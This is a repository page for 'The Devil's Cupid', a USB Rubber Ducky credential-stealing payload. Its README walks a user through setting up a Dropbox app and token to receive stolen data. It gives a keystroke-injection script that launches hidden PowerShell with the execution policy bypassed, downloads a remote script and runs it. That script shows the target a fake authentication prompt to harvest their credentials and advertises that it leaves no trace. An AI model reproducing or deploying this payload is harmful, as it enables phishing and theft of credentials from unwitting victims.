hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
usbrubberducky-payloads/payloads/library/credentials/DevilsCupid
History
nejc26 af3b9f6e89 Added README, Added files to folder 
Added README
Added DevilsCupid files from "credentials" to the DevilsCupid folder.
 		2023-02-28 12:34:54 +01:00
..
README.md Added README, Added files to folder 2023-02-28 12:34:54 +01:00
devilsCupid.ps1 Added README, Added files to folder 2023-02-28 12:34:54 +01:00
sourceCode.txt Added README, Added files to folder 2023-02-28 12:34:54 +01:00

README.md

Logo

The Devil's Cupid

Version 1.0
Last updated 24/02/2023

The Devil's Cupid is a Rubber Ducky script that tricks your target into sharing their credentials through a fake authentication pop up message.
It is highly adaptable and leaves no trace. (Thank you Avunit ❤️)

Setup

What you'll need:

Step 1

Go to your DropBox App Console and click Create app.

App creation
Configure the app as shown above. You can change Name you app to whatever you want.
After you've named your app, click Create app.

Once your app is created, navigate to the Permissions tab.
You need to enable:

  • files.metadata.write
  • files.content.write
  • files.content.read
  • file_requests.write

After making those changes, click Submit at teh bottom of the page to apply them.

Permissions

Navigate back to the Settings tab.

Access Token

Under Generate access token click Generate.
You will get a unique access token. Do not share it with anyone!

Copy the token. You will need it in the next step.

Step 2

Open devilsCupid.ps1 and edit $DropBoxAccessToken = "<YOUR DROPBOX ACCESS TOKEN HERE>".
Replace <YOUR DROPBOX ACCESS TOKEN HERE> with your token.

For example, if your access token is ...gwireg3hiu6rg8asasfsads2ad... it should look like this:
$DropBoxAccessToken = "...gwireg3hiu6rg8asasfsads2ad...".

Save the file.

Step 2

Go to your DropBox and upload your modified devilsCupid.ps1 to it.

DropBox Screenshot

Once it's done uploading, click Copy link.
The link should look something like https://www.dropbox.com/s/sk10x6okx49kcq9/devilsCupid.ps1?dl=0.

Step 3

Open inject.txt.
It will look like this:

DELAY 1000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr LINK_TO_YOUR_DEVILSCUPID.PS1; invoke-expression $pl
ENTER

Replace LINK_TO_YOUR_DEVILSCUPID.PS1 with the link you've copied in the previous step.

VERY IMPORTANT: Replace the end dl=0 with dl=1.
The modified link should look like https://www.dropbox.com/s/sk10x6okx49kcq9/devilsCupid.ps1?dl=1.

The modified inject.txt should look something like this:

DELAY 1000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://www.dropbox.com/s/sk10x6okx49kcq9/devilsCupid.ps1?dl=1; invoke-expression $pl
ENTER

Save the changes.

Step 4

Navigate to Ducktoolkit.com. Credits to James Hall & Kevin Breen for this awesome tool ❤️

Duck Toolkit

Paste your modified inject.txt code in the Duck Code box.
Select the keyboard layout under Language tab.
Click Encode Payload.

After encoding click Download inject.bin.

Put the inject.bin file on your Rubber Ducky.
You're done!